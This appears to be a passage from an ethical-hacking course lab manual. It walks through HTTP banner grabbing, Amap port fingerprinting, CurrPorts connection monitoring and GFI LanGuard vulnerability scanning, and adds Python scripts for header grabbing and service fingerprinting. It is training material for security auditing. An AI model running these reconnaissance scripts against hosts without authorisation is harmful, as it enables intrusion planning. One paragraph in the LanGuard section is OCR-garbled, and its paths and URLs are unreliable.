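constructed response carrying the headers recorded in the lab analysis table;
grab_http_banner() does the live query and needs network access.
"""
import socket
from typing import Dict

# Constructed sample: the headers from the lab table, followed by a short
# chunked body so the parser is exercised on a realistic response.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: Microsoft-IIS/6.0\r\n"
    b"X-Powered-By: PHP/4.4.8\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
    b"5\r\nhello\r\n0\r\n\r\n"
)

# Headers that commonly reveal the make, model and version of the server.
IDENTIFYING_HEADERS = ("server", "x-powered-by", "x-aspnet-version", "via")


def parse_response_headers(raw: bytes) -> Dict[str, str]:
    """Split an HTTP response into its status line and headers.

    Header names are lower-cased; the status line is stored under "status".
    Only the bytes before the first blank line are parsed, so a chunked or
    binary body never reaches the header parser.
    """
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    headers = {"status": lines[0].strip()}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:                                # skip malformed lines without a colon
            headers[name.strip().lower()] = value.strip()
    return headers


def identify_server(headers: Dict[str, str]) -> Dict[str, str]:
    """The headers ID Serve summarises as "The server identified itself as ..."."""
    return {name: headers[name] for name in IDENTIFYING_HEADERS if name in headers}


def grab_http_banner(host: str, port: int = 80, timeout: float = 5.0) -> Dict[str, str]:
    """Live equivalent of Query The Server: connect, request the default page
    with HTTP/1.0 (no keep-alive, so the server closes when done), and return
    the identifying headers."""
    request = f"GET / HTTP/1.0\r\nHost: {host}\r\n\r\n".encode()
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request)
        received = b""
        while b"\r\n\r\n" not in received:     # stop once the headers are complete
            data = sock.recv(4096)
            if not data:
                break
            received += data
    return identify_server(parse_response_headers(received))


if __name__ == "__main__":
    print(identify_server(parse_response_headers(SAMPLE_RESPONSE)))
    # Live query, as in the lab (needs network access):
    # print(grab_http_banner("www.certifiedhacker.com"))
```

For Question 2: the script speaks plain TCP, so as written it cannot query an HTTPS port; wrapping the socket with ssl.create_default_context().wrap_socket(sock, server_hostname=host) before sending the request is the way to extend it.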
Fingerprinting Open Ports Using the Amap Tool
Amap determines the application running on each open port.

Lab Scenario
Computers communicate using an IP address to reach a host and a port number to select the program that should receive the data; every data transfer therefore carries both. In the previous lab you found that the target web server accepts connections on the standard HTTP port 80. An attacker who learns which ports are open, and which application is behind each one, can choose attacks that fit that application. In this lab, you will learn to use the Amap tool to fingerprint open ports and determine exactly which application protocol is listening on each port found open.

Lab Objectives
The objective of this lab is to help students learn to fingerprint open ports and discover the applications running on them. In this lab, you will learn to:
■ Identify the application protocol running on open port 80
■ Detect application protocols

Lab Environment
To perform the lab, you need:
■ Amap, located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Banner Grabbing Tools\AMAP
■ You can also download the latest version of Amap from http://www.thc.org/thc-amap
■ If you decide to download the latest version, the screenshots shown in the lab might differ
■ A computer running web services on port 80
■ Administrative privileges to run the Amap tool
■ Run this tool on Windows Server 2012

Lab Duration
Time: 5 Minutes

Overview of Fingerprinting
Fingerprinting is used to discover the application running on each open port found on the network. It is achieved by sending trigger packets to the port and looking up the responses in a list of known response strings; every response that matches a known string is reported as a protocol match.

Lab Tasks
TASK 1: Identify Application Protocols Running on Port 80
1. Open the command prompt and navigate to the Amap directory. In this lab the Amap directory is D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Banner Grabbing Tools\AMAP.
2. Type amap www.certifiedhacker.com 80 and press Enter. Amap prints:

   amap v5.2 (www.thc.org/thc-amap) started at 2012-08-28 12:20:42 - MAPPING mode
   Unidentified ports: 202.75.54.101:80/tcp (total 1).
   amap v5.2 finished at 2012-08-28 12:20:53

FIGURE 3.1: Amap run against host name www.certifiedhacker.com on port 80

3. Amap lists each application protocol it recognizes on the entered host name and port. In the run shown, port 80 was reported as an unidentified port: the connection succeeded, but no response matched a known string, either because the service answered with something Amap's signature list does not cover or because it did not answer the triggers at all. Document such a result as "unidentified", not as "nothing running".
4. Use the IP address to check the applications running on a particular port.
5. In the command prompt, type amap 10.0.0.4 75-81, where 10.0.0.4 is the IP address of your local Windows Server 2008 virtual machine (the IP address will be different in your network), and press Enter.
6. Try scanning different websites with different port ranges, for example amap www.certifiedhacker.com 1-200.

Syntax: amap [-A|-B|-P|-W] [-1buSRHUdqv] [[-m] -o <file>] [-D <file>] [-t/-T sec] [-c cons] [-C retries] [-p proto] [-i <file>] [target port [port]...]

Note: For Amap options, type amap -help.
FIGURE 3.2: Amap run against IP address 10.0.0.4 with port range 75-81. The command prints:

   amap v5.2 (www.thc.org/thc-amap) started at 2012-08-28 12:27:51 - MAPPING mode
   Protocol on 10.0.0.4:80/tcp matches http
   Protocol on 10.0.0.4:80/tcp matches http-apache-2
   Warning: Could not connect (unreachable) to 10.0.0.4:76/tcp, disabling port (EUNKN)
   Warning: Could not connect (unreachable) to 10.0.0.4:75/tcp, disabling port (EUNKN)
   Warning: Could not connect (unreachable) to 10.0.0.4:77/tcp, disabling port (EUNKN)
   Warning: Could not connect (unreachable) to 10.0.0.4:78/tcp, disabling port (EUNKN)
   Warning: Could not connect (unreachable) to 10.0.0.4:79/tcp, disabling port (EUNKN)
   Warning: Could not connect (unreachable) to 10.0.0.4:81/tcp, disabling port (EUNKN)
   Protocol on 10.0.0.4:80/tcp matches http-iis
   Protocol on 10.0.0.4:80/tcp matches webmin
   Unidentified ports: 10.0.0.4:75/tcp 10.0.0.4:76/tcp 10.0.0.4:77/tcp 10.0.0.4:78/tcp 10.0.0.4:79/tcp 10.0.0.4:81/tcp (total 6).
   amap v5.2 finished at 2012-08-28 12:27:54

Lab Analysis
Document all the IP addresses, open ports and their running applications, and the protocols you discovered during the lab.

Tool/Utility: Amap
Information Collected/Objectives Achieved:
■ Identified open port: 80
■ Web server signatures matched on port 80: http-apache-2, http-iis, webmin
■ Unidentified ports: 10.0.0.4:75/tcp, 10.0.0.4:76/tcp, 10.0.0.4:77/tcp, 10.0.0.4:78/tcp, 10.0.0.4:79/tcp, 10.0.0.4:81/tcp

Two points to read from this output. First, Amap reports every signature that matches, not a single best guess: port 80 matched the generic http signature and three product-specific ones (http-apache-2, http-iis, webmin), which cannot all be true, so confirm the actual product from the banner before recording it. Second, the ports listed as unidentified were never reached: the warnings show that the connection to each of them failed and Amap disabled the port, so "unidentified" here means closed or unreachable, not an unknown service.

Note: Amap compiles on all UNIX-based platforms, including Mac OS X, Cygwin on Windows, ARM-Linux and PalmOS.
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions
1. Execute the Amap command for a host name with a port number other than 80.
2. Analyze how the Amap utility determines the applications running on different machines.
3. Use various Amap options and analyze the results.

Internet Connection Required: ☑ Yes ☐ No
Platform Supported: ☑ Classroom ☐ iLabs
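The following Python script is an added example written for this lab; it is not taken from Amap. It shows the trigger-and-response method described in the overview and asked about in Question 2: a table of (protocol, trigger, expected response pattern), one connection per trigger, and a report of every signature that matched, mirroring Amap's MAPPING mode output including the "Could not connect ... disabling port" warning and the "Unidentified ports" summary. The signature table is a small hand-written subset constructed for illustration, and the sample responses are constructed, not captured from the lab hosts.

```python
"""Trigger-and-response application fingerprinting, the method Amap uses.

Added example for this lab, not Amap's code or its signature database. The
signature table is a small hand-written subset constructed for illustration;
the sample responses are constructed, not captured from the lab hosts.
"""
import re
import socket
from typing import Dict, List, Tuple

# (protocol, trigger to send, pattern looked for in the reply). An empty trigger
# means "connect and read the greeting", for services that speak first. Every
# pattern is searched, so several protocols can match one response.
HTTP_TRIGGER = b"GET / HTTP/1.0\r\n\r\n"
SIGNATURES: List[Tuple[str, bytes, re.Pattern]] = [
    ("http",          HTTP_TRIGGER, re.compile(rb"^HTTP/1\.[01] \d{3}")),
    ("http-iis",      HTTP_TRIGGER, re.compile(rb"\r\nServer: Microsoft-IIS/")),
    ("http-apache-2", HTTP_TRIGGER, re.compile(rb"\r\nServer: Apache/2\.")),
    ("ssh",           b"",          re.compile(rb"^SSH-\d\.\d-")),
    ("smtp",          b"",          re.compile(rb"^220 .*E?SMTP")),
    ("ftp",           b"",          re.compile(rb"^220 .*FTP")),
]

# Constructed sample responses.
SAMPLE_IIS = b"HTTP/1.1 200 OK\r\nServer: Microsoft-IIS/6.0\r\nContent-Type: text/html\r\n\r\n<html>"
SAMPLE_SSH = b"SSH-2.0-OpenSSH_5.9p1 Debian-5ubuntu1\r\n"
SAMPLE_NOISE = b"\x16\x03\x01\x00\x05hello"   # matches nothing in the table


def match_response(data: bytes) -> List[str]:
    """Every protocol whose pattern occurs in the response, in table order."""
    return [name for name, _trigger, pattern in SIGNATURES if pattern.search(data)]


def probe(host: str, port: int, trigger: bytes, timeout: float = 3.0) -> bytes:
    """One connection per trigger: connect, send it, read the reply.

    Connection failures propagate as OSError so the caller can disable the
    port, which is what Amap's "Could not connect ... disabling port" means.
    """
    with socket.create_connection((host, port), timeout=timeout) as sock:
        if trigger:
            sock.sendall(trigger)
        try:
            return sock.recv(4096)
        except socket.timeout:
            return b""                      # open but silent: no greeting, no reply


def fingerprint_port(host: str, port: int) -> Dict[str, object]:
    """Send each distinct trigger to the port and merge all matches.

    Returns {"reachable": bool, "matches": [protocol, ...]}.
    """
    triggers: List[bytes] = []
    for _name, trigger, _pattern in SIGNATURES:
        if trigger not in triggers:
            triggers.append(trigger)
    matches: List[str] = []
    for trigger in triggers:
        try:
            data = probe(host, port, trigger)
        except OSError:
            return {"reachable": False, "matches": []}
        for name in match_response(data):
            if name not in matches:
                matches.append(name)
    return {"reachable": True, "matches": matches}


def format_report(host: str, results: Dict[int, Dict[str, object]]) -> List[str]:
    """Render results in the style of Amap's MAPPING mode output."""
    lines: List[str] = []
    unidentified: List[str] = []
    for port in sorted(results):
        result = results[port]
        if not result["reachable"]:
            lines.append(f"Warning: Could not connect (unreachable) to {host}:{port}/tcp, disabling port")
        for name in result["matches"]:
            lines.append(f"Protocol on {host}:{port}/tcp matches {name}")
        if not result["matches"]:
            unidentified.append(f"{host}:{port}/tcp")
    if unidentified:
        lines.append("Unidentified ports: " + " ".join(unidentified) + f" (total {len(unidentified)}).")
    return lines


if __name__ == "__main__":
    for sample in (SAMPLE_IIS, SAMPLE_SSH, SAMPLE_NOISE):
        print(match_response(sample))
    # Live equivalent of "amap 10.0.0.4 75-81" (needs a reachable host):
    # results = {p: fingerprint_port("10.0.0.4", p) for p in range(75, 82)}
    # print("\n".join(format_report("10.0.0.4", results)))
```

Because every pattern is searched independently, one response can match several rows, which is exactly why the lab's port 80 came back as http, http-apache-2, http-iis and webmin at once; a real signature database is far larger, and the quality of the result depends on how specific each pattern is.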
Monitoring TCP/IP Connections Using the CurrPorts Tool
CurrPorts is network monitoring software that displays the list of all currently open TCP/IP and UDP ports on your local computer.

Lab Scenario
In the previous lab you learned how to fingerprint open ports using the Amap tool. As an ethical hacker and penetration tester, you must be able to block attacks against such ports by using appropriate firewall rules or by disabling unnecessary services running on the computer. You already know that the Internet uses the TCP/IP protocol suite to format and transfer data. An attacker who can observe an ongoing TCP connection sees everything in the IP and TCP headers and in the packet payloads, and with the addresses, ports and sequence numbers from those headers can forge packets that the endpoints accept as part of the connection and hijack it. As a network administrator, your daily task is to check the TCP/IP connections of each server you manage. You have to monitor all TCP and UDP ports and list all the established IP addresses of the server using the CurrPorts tool.

Lab Objectives
The objective of this lab is to help students determine and list all the TCP/IP and UDP ports of a local computer. In this lab, you need to:
■ Scan the system for currently open TCP/IP and UDP ports
■ Gather information on the ports and the processes that opened them
■ List all the IP addresses that currently have established connections
■ Close unwanted TCP connections and kill the process that opened the ports
Lab Environment
To perform the lab, you need:
■ CurrPorts, located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Scanning Tools\CurrPorts
■ You can also download the latest version of CurrPorts from http://www.nirsoft.net/utils/cports.html
■ If you decide to download the latest version, the screenshots shown in the lab might differ
■ A computer running Windows Server 2012
■ Double-click cports.exe to run this tool
■ Administrator privileges to run the CurrPorts tool

Lab Duration
Time: 10 Minutes

Note: You can download the CurrPorts tool from http://www.nirsoft.net.

Overview of Monitoring TCP/IP
Monitoring TCP/IP ports shows which IP connections are currently established. Scanning TCP/IP ports gathers information on all the open TCP and UDP ports and also displays all the remote IP addresses with established connections to the server.

Lab Tasks
The CurrPorts utility is a standalone executable and doesn't require any installation process or additional DLLs (Dynamic Link Libraries). Extract CurrPorts to the desired location and double-click cports.exe to launch it.

TASK 1: Discover TCP/IP Connections
1. Launch CurrPorts. It automatically displays the process name, ports, local and remote addresses, and their states.
FIGURE 4.1: The CurrPorts main window with all processes, ports, and IP addresses (columns: Process Name, Process ID, Protocol, Local Port, Local Port Name, Local Address, Remote Port, Remote Port Name, Remote Address, Remote Host Name; status bar: 79 Total Ports, 21 Remote Connections, 1 Selected)

2. CurrPorts lists all the processes and their IDs, the protocols used, the local and remote IP addresses, the local and remote ports, and the remote host names.
3. To view all the items as an HTML report, click View -> HTML Report - All Items.

FIGURE 4.2: CurrPorts with HTML Report - All Items selected from the View menu

4. The HTML report automatically opens in the default browser.

FIGURE 4.3: The web browser displaying the CurrPorts report - All Items (TCP/UDP Ports List created by using CurrPorts)

5. To save the generated CurrPorts report from the web browser, click File -> Save Page As... (Ctrl+S).

Note: The bottom left of the CurrPorts window shows the status of total ports and remote connections.
Note: To check the countries of the remote IP addresses, you have to download the latest IP-to-Country file and put the IpToCountry.csv file in the same folder as cports.exe.
FIGURE 4.4: The web browser File menu used to save the CurrPorts Report - All Items

6. To view only the selected items as an HTML report, select the items and click View -> HTML Report - Selected Items.

FIGURE 4.5: CurrPorts with HTML Report - Selected Items selected from the View menu

7. The selected report automatically opens in the default browser.

Note: CurrPorts allows you to save all changes (added and removed connections) into a log file. To start writing to the log file, check the Log Changes option under the File menu. By default, the log file is saved as cports.log in the same folder where cports.exe is located; you can change the default log filename by setting the LogFilename entry in the cports.cfg file. Be aware that the log file is updated only when you refresh the ports list manually or when the Auto Refresh option is turned on.
Note: You can also right-click on the web page and save the report.
FIGURE 4.6: The web browser displaying the CurrPorts HTML Report - Selected Items (for example chrome.exe 2988 TCP 4148 10.0.0.7 -> 173.194.36.26:443 https, Established; firefox.exe 1368 TCP 4163 10.0.0.7 -> 173.194.36.15:443 https, Established; httpd.exe 1800 TCP 1070, Listening)

Note: In the Filters dialog box, you can add one or more filter strings (separated by spaces, semicolons, or CRLF).

8. To save the generated CurrPorts report from the web browser, click File -> Save Page As... (Ctrl+S).

FIGURE 4.7: The web browser File menu used to save the CurrPorts HTML Report - Selected Items

9. To view the properties of a port, select the port and click File -> Properties.

Note: The syntax for a filter string is [include | exclude]:[local | remote | both | process]:[tcp | udp | tcpudp]:[IP Range | Ports Range].
Note: The command-line option /stext <Filename> saves the list of all opened TCP/UDP ports into a regular text file.
FIGURE 4.8: The CurrPorts File menu used to view properties for a selected port (IPNetInfo Ctrl+I, Close Selected TCP Connections Ctrl+T, Kill Processes Of Selected Ports, Save Selected Items Ctrl+S, Properties Alt+Enter, Process Properties Ctrl+P, Log Changes, Open Log File, Clear Log File, Advanced Options Ctrl+O, Exit)

Note: The command-line option /stab <Filename> saves the list of all opened TCP/UDP ports into a tab-delimited text file.

10. The Properties window appears and displays all the properties of the selected port: Process Name, Process ID, Protocol, Local Port, Local Port Name, Local Address, Remote Port, Remote Port Name, Remote Address, Remote Host Name, State, Process Path, Product Name, File Description, File Version, Company, Process Created On, User Name, Process Services, Process Attributes, Added On, Module Filename, Remote IP Country, and Window Title. In the figure, the selected port belongs to firefox.exe (process ID 1368), TCP local port 4166 on 10.0.0.7, connected to 173.194.36.0 (bom04s01-in-f0.1e100.net) on port 443 (https), state Established, process path C:\Program Files (x86)\Mozilla Firefox\firefox.exe, Firefox 14.0.1 by Mozilla Corporation.
11. Click OK to close the Properties window.

FIGURE 4.9: The CurrPorts Properties window for the selected port

Note: The command-line option /shtml <Filename> saves the list of all opened TCP/UDP ports into an HTML file (horizontal).
TASK 2: Close TCP Connection
12. To close a TCP connection you think is suspicious, select the connection and click File -> Close Selected TCP Connections (or press Ctrl+T).

FIGURE 4.10: The CurrPorts Close Selected TCP Connections option

TASK 3: Kill Process
13. To kill the process that owns a port, select the port and click File -> Kill Processes Of Selected Ports.

FIGURE 4.11: The CurrPorts Kill Processes Of Selected Ports option

Check the Process Path and Product Name in the Properties window before killing anything: the list also contains system processes such as lsass.exe (listening on TCP port 1028 in the figures), and terminating one of those disrupts the server. Closing the connection is the less destructive response when you only want to cut off a single remote peer.

14. To exit the CurrPorts utility, click File -> Exit. The CurrPorts window closes.
FIGURE 4.12: The CurrPorts Exit option

Note: The command-line option /sverhtml <Filename> saves the list of all opened TCP/UDP ports into an HTML file (vertical).

Lab Analysis
Document all the IP addresses, open ports and their running applications, and the protocols discovered during the lab.

Tool/Utility: CurrPorts
Information Collected/Objectives Achieved:
■ Profile details: network scan for open ports
■ Scanned report fields: Process Name, Process ID, Protocol, Local Port, Local Address, Remote Port, Remote Port Name, Remote Address, Remote Host Name

Note: On the command line, the syntax of the /close command is /close <Local Address> <Local Port> <Remote Address> <Remote Port>.
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions
1. Analyze the results from CurrPorts by creating a filter string that displays only connections with remote TCP port 80 and UDP port 53, and running it.
2. Analyze and evaluate the output by creating a filter that displays only the ports opened by the Firefox browser.
3. Determine the use of each of the following options available under the Options menu of CurrPorts:
   a. Display Established
   b. Mark Ports Of Unidentified Applications
   c. Display Items Without Remote Address
   d. Display Items With Unknown State

Internet Connection Required: ☐ Yes ☑ No
Platform Supported: ☑ Classroom ☑ iLabs

Note: CurrPorts allows you to easily translate all menus, dialog boxes, and strings to other languages.
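The following Python script is an added example for this lab, not CurrPorts code. It evaluates filter strings of the form given in the lab notes, [include | exclude]:[local | remote | both | process]:[tcp | udp | tcpudp]:[IP Range | Ports Range], over a connection table with the same columns as the CurrPorts window, and so works through Questions 1 and 2 (the filter for remote TCP port 80 and UDP port 53, and a filter for the Firefox process) and the Mark Ports Of Unidentified Applications option from Question 3. The connection records are constructed to resemble the rows in the figures, not captured from a host. Two assumptions of the example: the process form is taken to be include:process:<name>, and an "unidentified application" is taken to mean a process whose binary carries no product name or file version, the fields shown in the Properties window.

```python
"""CurrPorts-style filter strings evaluated over a table of connections.

Added example for the CurrPorts lab, not CurrPorts code. Records are constructed
to resemble the rows in the lab figures. Assumptions: process filters are written
include:process:<name>, and an "unidentified application" is a process whose
binary has no product name or file version (Properties window fields).
"""
import ipaddress
import re
from dataclasses import dataclass
from typing import List


@dataclass(frozen=True)
class Connection:
    process: str
    pid: int
    protocol: str       # "TCP" or "UDP"
    local_addr: str
    local_port: int
    remote_addr: str    # "" and 0 for a listening socket with no remote endpoint
    remote_port: int
    state: str
    product: str        # product name / file version of the binary, "" if none


SAMPLE: List[Connection] = [   # constructed, IPv4 only
    Connection("chrome.exe", 2988, "TCP", "10.0.0.7", 4119, "173.194.36.26", 80, "Established", "Google Chrome"),
    Connection("firefox.exe", 1368, "TCP", "10.0.0.7", 4163, "173.194.36.15", 443, "Established", "Firefox 14.0.1"),
    Connection("firefox.exe", 1368, "TCP", "127.0.0.1", 3981, "127.0.0.1", 3982, "Established", "Firefox 14.0.1"),
    Connection("httpd.exe", 1800, "TCP", "0.0.0.0", 1070, "", 0, "Listening", "Apache HTTP Server"),
    Connection("lsass.exe", 564, "TCP", "0.0.0.0", 1028, "", 0, "Listening", "Microsoft Windows"),
    Connection("svchost.exe", 1012, "UDP", "10.0.0.7", 52113, "10.0.0.1", 53, "", "Microsoft Windows"),
    Connection("updater.exe", 4412, "TCP", "10.0.0.7", 4200, "203.0.113.9", 8080, "Established", ""),
]

FILTER_RE = re.compile(r"^(include|exclude):(local|remote|both|process):(.+)$", re.I)


@dataclass(frozen=True)
class Filter:
    action: str     # include / exclude
    scope: str      # local / remote / both / process
    protocol: str   # tcp / udp / tcpudp
    spec: str       # port, port range, IP, IP range, or process name


def parse_filter(text: str) -> Filter:
    m = FILTER_RE.match(text.strip())
    if not m:
        raise ValueError(f"bad filter: {text!r}")
    action, scope, rest = m.group(1).lower(), m.group(2).lower(), m.group(3)
    if scope == "process":
        return Filter(action, scope, "tcpudp", rest.lower())
    protocol, sep, spec = rest.partition(":")
    if not sep or protocol.lower() not in ("tcp", "udp", "tcpudp") or not spec:
        raise ValueError(f"bad filter: {text!r}")
    return Filter(action, scope, protocol.lower(), spec)


def _in_range(value, spec: str, conv) -> bool:
    """True if value lies within spec, written as "x" or "x-y"."""
    low, _, high = spec.partition("-")
    lo = conv(low)
    return lo <= value <= (conv(high) if high else lo)


def _endpoint_matches(f: Filter, addr: str, port: int) -> bool:
    if not addr:                        # listening socket: no endpoint to compare
        return False
    if "." in f.spec:                   # IP or IP range
        return _in_range(ipaddress.ip_address(addr), f.spec, ipaddress.ip_address)
    return _in_range(port, f.spec, int) # port or port range


def filter_matches(f: Filter, c: Connection) -> bool:
    if f.scope == "process":
        return c.process.lower() == f.spec
    if f.protocol != "tcpudp" and f.protocol != c.protocol.lower():
        return False
    local = _endpoint_matches(f, c.local_addr, c.local_port)
    remote = _endpoint_matches(f, c.remote_addr, c.remote_port)
    return {"local": local, "remote": remote, "both": local or remote}[f.scope]


def apply_filters(conns: List[Connection], filter_text: str) -> List[Connection]:
    """Keep items matching any include filter (all items if there is none), then
    drop items matching any exclude filter. Separators: spaces, semicolons, CRLF."""
    filters = [parse_filter(t) for t in re.split(r"[\s;]+", filter_text) if t]
    includes = [f for f in filters if f.action == "include"]
    excludes = [f for f in filters if f.action == "exclude"]
    return [c for c in conns
            if (not includes or any(filter_matches(f, c) for f in includes))
            and not any(filter_matches(f, c) for f in excludes)]


def unidentified_ports(conns: List[Connection]) -> List[Connection]:
    """Rows that the Mark Ports Of Unidentified Applications option would highlight."""
    return [c for c in conns if not c.product]
```

The filter for Question 1 is apply_filters(SAMPLE, "include:remote:tcp:80 include:remote:udp:53"), which keeps the chrome.exe row to port 80 and the svchost.exe DNS row; for Question 2, apply_filters(SAMPLE, "include:process:firefox.exe"). Listening sockets never match a remote filter because they have no remote endpoint, which is the same reason the Display Items Without Remote Address option exists.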
Scanning for Network Vulnerabilities Using GFI LanGuard 2012
GFI LanGuard scans networks and ports to detect, assess, and correct any security vulnerabilities that are found.

Lab Scenario
In the previous lab you learned to monitor TCP/IP and UDP ports on your local computer or network using CurrPorts. That tool automatically marks in pink the suspicious TCP/UDP ports owned by unidentified applications, and to stop an attack in progress you can select one or more items and close the selected connections.
Your company's web server is hosted by a large ISP and is well protected behind a firewall. Your company needs to audit the defenses used by the ISP. After a scan was started, a serious vulnerability was identified but not immediately corrected by the ISP. An attacker exploits this vulnerability and places a backdoor on the server. Using the backdoor, the attacker gains complete access to the server and is able to manipulate the information on it. The attacker also uses the compromised server as a stepping stone to attack other servers on the ISP's network.
As a security administrator and penetration tester for your company, you need to conduct penetration testing in order to determine the list of threats and vulnerabilities to the network infrastructure you manage. In this lab, you will use GFI LanGuard 2012 to scan your network for vulnerabilities.

Lab Objectives
The objective of this lab is to help students conduct vulnerability scanning, patch management, and network auditing. In this lab, you need to:
■ Perform a vulnerability scan
  • 30. Module 03 - Scanning Networks ■ Audit the network ■ Detect vulnerable ports ■ Identify sennit}‫־‬vulnerabilities ■ Correct security vulnerabilities with remedial action Lab Environm ent To perform die lab, you need: ■ GFI Languard located at D:CEH-ToolsCEHv8 Module 03 Scanning NetworksWulnerability Scanning ToolsGFI LanGuard ■ You can also download the latest version of GFI Languard from the link http://www.gfi.com/la1111etsca11 ■ If you decide to download the latest version, then screenshots shown in the lab might differ ■ A computer running Windows 2012 Server as die host machine ■ Windows Server 2008 running in virtual machine ■ Microsoft ■NET Framework 2.0 ■ Administrator privileges to run die GFI LANguard Network Security Scanner ■ It requires die user to register on the GFI w ebsite http: / / www.gii.com/la1111etsca11 to get a license key ■ Complete die subscription and get an activation code; the user will receive an email diat contains an activation code Lab Duration Time: 10 Minutes O verview of Scanning N etw ork As an adminisuator, you often have to deal separately widi problems related to vulnerability issues, patch m anagement, and network auditing. It is your responsibility to address all die viilnerability management needs and act as a virtual consultant to give a complete picture of a network setup, provide risk analysis, and maintain a secure and compliant network state faster and more effectively. Security scans or audits enable you to identify and assess possible risks within a network. Auditing operations imply any type of checking performed during a network security audit. These include open port checks, missing Microsoft patches and vulnerabilities, service infomiation, and user or process information. Q You can download GFI LANguard from http:/ /wwwgfi.com. 
GFI LANguard works on Microsoft Windows Server 2008 Standard/Enterprise, Windows Server 2003 Standard/Enterprise, Windows 7 Ultimate, Microsoft Small Business Server 2008 Standard, Small Business Server 2003 (SP1), and Small Business Server 2000 (SP2).

GFI LANguard includes default configuration settings that allow you to run immediate scans soon after the installation is complete.
Lab Tasks

Follow the wizard-driven installation steps to install the GFI LANguard network scanner on the host machine (Windows Server 2012).

TASK 1: Scanning for Vulnerabilities

1. Navigate to Windows Server 2012 and launch the Start menu by hovering the mouse cursor in the lower-left corner of the desktop.

FIGURE 5.1: Windows Server 2012 - Desktop view

2. Click the GFI LanGuard 2012 app to open the GFI LanGuard 2012 window.

FIGURE 5.2: Windows Server 2012 - Apps

3. The GFI LanGuard 2012 main window appears and displays the Network Audit tab contents.

To execute a scan successfully, GFI LANguard must remotely log on to target computers with administrator privileges.
The default scanning options, which provide quick access to scanning modes, are:
■ Quick scan
■ Full scan
■ Launch a custom scan
■ Set up a scheduled scan

FIGURE 5.3: The GFI LANguard main window (the Local Computer Vulnerability Level reads "Current Vulnerability Level is: High")

4. Click the Launch a Scan option to perform a network scan.
FIGURE 5.4: The GFI LANguard main window indicating the Launch a Custom Scan option

5. The Launch a New Scan window appears:
i. In the Scan Target option, select localhost from the drop-down list
ii. In the Profile option, select Full Scan from the drop-down list
iii. In the Credentials option, select currently logged on user from the drop-down list

6. Click Scan.

Custom scans are recommended:
■ When performing a one-time scan with particular scanning parameters/profiles
■ When performing a scan for particular network threats and/or system information
■ To perform a target computer scan using a specific scan profile

If intrusion detection software (IDS) is running during scans, GFI LANguard sets off a multitude of IDS warnings and intrusion alerts in these applications.
FIGURE 5.5: Selecting an option for network scanning

7. Scanning will start; it will take some time to scan the network. See the following figure.

For large network environments, a Microsoft SQL Server/MSDE database backend is recommended instead of the Microsoft Access database.

Quick scans have relatively short scan durations compared to full scans, mainly because quick scans perform vulnerability checks on only a subset of the entire database. It is recommended to run a quick scan at least once a week.

8. After the scan completes, the scan results are shown in the left panel.
FIGURE 5.7: The GFI LanGuard custom scan wizard (scan completed for scan target localhost, 10.0.0.7; the results statistics list audit operations processed, missing software updates, other vulnerabilities, and potential vulnerabilities)

9. To check the Scan Result Overview, click the IP address of the machine in the right panel.

10. It shows the Vulnerability Assessment and Network & Software Audit; click Vulnerability Assessment.
FIGURE 5.8: Selecting the Vulnerability Assessment option

Types of scans:
■ Scan a single computer: Select this option to scan a local host or one specific computer.
■ Scan a range of computers: Select this option to scan a number of computers defined through an IP range.
■ Scan a list of computers: Select this option to import a list of targets from a file or to select targets from a network list.
■ Scan computers in text file: Select this option to scan targets enumerated in a specific text file.
■ Scan a domain or workgroup: Select this option to scan all targets connected to a domain or workgroup.
11. It shows all the Vulnerability Assessment indicators by category.

During a full scan, GFI LANguard scans target computers to retrieve setup information and identify all security vulnerabilities, including:
■ Missing Microsoft updates
■ System software information, including unauthorized applications, incorrect antivirus settings, and outdated signatures
■ System hardware information, including connected modems and USB devices

FIGURE 5.9: List of Vulnerability Assessment categories

12. Click Network & Software Audit in the right panel, and then click System Patching Status, which shows all the system patching statuses.

FIGURE 5.10: System patching status report

13. Click Ports, and under this, click Open TCP Ports.

Due to the large amount of information retrieved from scanned targets, full scans often tend to be lengthy. It is recommended to run a full scan at least once every 2 weeks.
FIGURE 5.11: TCP/UDP Ports result

14. Click System Information in the right side panel; it shows all the details of the system information.

A custom scan is a network audit based on parameters that you configure on the fly before launching the scanning process.
Various parameters can be customized during this type of scan, including:
■ Type of scanning profile (i.e., the type of checks to execute/type of data to retrieve)
■ Scan targets
■ Logon credentials

15. Click Password Policy.

FIGURE 5.12: Information of Password Policy (minimum password length: 0 chars; maximum password age: 42 days; minimum password age: 0 days; password history: no history)

16. Click Groups: it shows all the groups present in the system.

The next job after a network security scan is to identify which areas and systems require your immediate attention. Do this by analyzing and correctly interpreting the information collected and generated during a network security scan.
FIGURE 5.13: Information of Groups

17. Click the Dashboard tab: it shows all the scanned network information.
FIGURE 5.14: Scanned report of the network

Lab Analysis

Document all the results, threats, and vulnerabilities discovered during the scanning and auditing process.

A high vulnerability level is the result of vulnerabilities or missing patches whose average severity is categorized as high.

A scheduled scan is a network audit scheduled to run automatically on a specific date/time and at a specific frequency. Scheduled scans can be set to execute once or periodically.

It is recommended to use scheduled scans:
■ To perform periodical/regular network vulnerability scans automatically, using the same scanning profiles and parameters
■ To trigger scans automatically after office hours and to generate alerts and auto-distribution of scan results via email
■ To automatically trigger auto-remediation options (e.g., auto download and deploy missing updates)
Tool/Utility: GFI LanGuard 2012

Information Collected/Objectives Achieved:
■ Vulnerability Level
■ Vulnerability Assessment
■ System Patching Status
■ Scan Results Details for Open TCP Ports
■ Scan Results Details for Password Policy
■ Dashboard - Entire Network:
  ■ Vulnerability Level
  ■ Security Sensors
  ■ Most Vulnerable Computers
  ■ Agent Status
  ■ Vulnerability Trend Over Time
  ■ Computer Vulnerability Distribution
  ■ Computers by Operating System

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions
1. Analyze how GFI LANguard products provide protection against a worm.
